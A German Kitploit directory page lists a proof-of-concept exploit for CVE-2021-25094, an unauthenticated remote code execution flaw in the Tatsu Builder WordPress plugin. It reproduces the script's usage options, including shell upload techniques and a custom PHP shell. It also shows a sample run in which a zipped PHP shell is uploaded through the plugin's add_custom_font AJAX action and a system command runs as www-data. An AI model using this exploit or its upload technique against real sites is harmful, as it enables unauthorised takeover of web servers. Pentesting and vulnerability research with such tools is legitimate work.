Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-25094-tatsu-preauth-rce — Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung im Tatsu Builder WordPress-Plugin (CVE-2021-25094). Unterstützt mehrere Shell-Techniken, Proxy und Komprimierungsstufen. | Kitploit
Tools/GitHubGitHub/darkpills/cve-2021-25094-tatsu-preauth-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubdarkpills/cve-2021-25094-tatsu-preauth-rce

CVE-2021-25094-tatsu-preauth-rce

Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung im Tatsu Builder WordPress-Plugin (CVE-2021-25094). Unterstützt mehrere Shell-Techniken, Proxy und Komprimierungsstufen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
932vor 3 JahrenNoch nicht geprüft
Teilen

Preauth RCE im Tatsu Builder Wordpress Plugin (CVE-2021-25094)

Einfacher PoC einer nicht authentifizierten RCE in Tatsu Builder <= 3.3.11, bereitgestellt als Beispiel.

Vollständiger Artikel hier: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/

Verwendung:

root@kitploit:~
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd

positional arguments:
  url                   Wordpress-angreifbare URL (Beispiel: https://mywordpress.com/)
  cmd                   Auszuführender OS-Befehl

optional arguments:
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm
  --technique TECHNIQUE
                        Shell-Technik: php | htaccess | custom
  --customShell CUSTOMSHELL
                        Geben Sie eine benutzerdefinierte PHP-Shell-Datei an, die einen base64-codierten Befehl als $_POST['text']-Eingabe nimmt
  --keep KEEP           Löscht die hochgeladene PHP-Shell nicht automatisch
  --proxy PROXY         Geben Sie einen HTTP-Proxy an und verwenden Sie ihn (Beispiel: http://localhost:8080)
  --compressionLevel COMPRESSIONLEVEL
                        Komprimierungsstufe der Zip-Datei (0 bis 9, Standard 9)

Beispiel:

root@kitploit:~
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: Pre-Auth RCE-Exploit für Tatsu Wordpress Plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)

[+] Erstelle eine Zip-Datei mit der Shell-Technik 'php'
[+] Lade Zip-Archiv hoch zu http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload erfolgreich
[+] Shell auslösen bei http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit erfolgreich!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell-Datei wurde automatisch gelöscht, das übergeordnete Verzeichnis bleibt jedoch auf dem Webserver
[+] Erledigt
Tool herunterladen